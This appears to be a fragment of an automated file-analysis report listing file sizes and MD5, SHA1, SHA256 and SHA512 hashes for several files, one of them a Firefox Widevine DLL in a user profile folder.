SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
10KB
MD5441828d039210ebea8e2fdf7a46ded65
SHA124bd2823683c136cabb1f490f99a2bf89bd977ae
SHA256d659eba84bb16f5a62788206ba179b1d033a1ca8e993c40355dcc13bd9d26a5d
SHA5125fda52beb98a32f1f01e7a4942e4e6800d379870fbef5f3f3481159db4e07655b0dfb022e37119c0fbf65dbfb21a096ecff3704d21a11dd4ba382cbf89dece44
-
Filesize
12KB
MD5e48b74834b0332c9a2cc3343328f4d40
SHA19b4f93d66926af372e82dbd29152759b91e46f6d
SHA25661ff035b55090ee75c9c7b9c072cbc5eb9ec2c338e861e2da0950c1eab4423fe
SHA51243ececfb000348b4dc24ec2275cfba1165689863ac42dc825ecf732bf42af4f436379cfe01025cea6c3cca67432b38c2d9e82a191dade48374a7c0ae5f50ad54
-
Filesize
15KB
MD50ac146493a1e788f6901668afd99968e
SHA11c8035637a7812b495b78f0565776d66b9bceace
SHA2566f6d2281f3ac1b8a302ca6914e51527f5c185533059206f369633dc46d78d9c9
SHA512f25f7a36543f68c6c0175367d022cf8087e196ccace3cc2566fb89747c5c01a79b4cdd339702b05cedfcfb18ece841b9debe29cbe83b1a23abd09280b9065589
-
Filesize
10KB
MD507fdaf655c99d5e1d50d7002c2d57893
SHA1177c70f9f056d16ed640c8eff2216bfe5668a474
SHA256de72e7d9cb930a0ca770ca60b4340809c2529f946163da1627b713c37dea5efe
SHA512c95fc0d943a8fb6fb16fe6bd83ea24a21c1ec3245fd5a7fc00dd925f24a2fc72733249b6dc1912d6daa23bd21f1b2f17a6cf27200be9ab5ea0290c04072ee5c5
-
Filesize
3.3MB
MD51ea029e7274746e01f4c285d638f2a1c
SHA11e582b370a95fe21c9a55d317830cb6f5a2d8e6b
SHA256eeddee0a57a540792aac5854451c760ccf3912db09a0dfbebbd5a175413587ed
SHA51299d16c1626b7e48a5f7303fa8595dbc9544383b6734904e39c0b8e20fc90c6229d18ee544b95d1a54236f74bb59af25f2f9eb0681a2acf8e392d244cf31e90d4
-
Filesize
203B
MD5eecba84beeb16a6f77a1345dc5c50d9a
SHA176c75599399493be5fa20e6065cf72ef05e238a0
SHA25631a4b66ee13c7872264957aaa0bc36fcb780473e7d6096853f20ad45b541696e
SHA51254e38ff09bf1e3fb8a7582c81acf2a329d039e85c2309624fd4209decded578b5db16e4e0a6325e476ee97228849431f5229bb8d21b0263ab1d955619ba4c75f
-
Filesize
201B
MD5cbbe2c3d8f2c923ccac8ef7d747b8a20
SHA1b308635869370794019b9337dd326d97f79ee094
SHA256c4f65a5c34ae749bd3dbaba98e14a5443e4a84a8aa48800c29c6fc3df8739d7c
SHA5126451e45b0bfd329d89ee4f8b696fb20739619038471d9401dde5cd174df24f0b82bd3715e8910bece8542639638d846f9f16317b695f1f00832cf790d106b0eb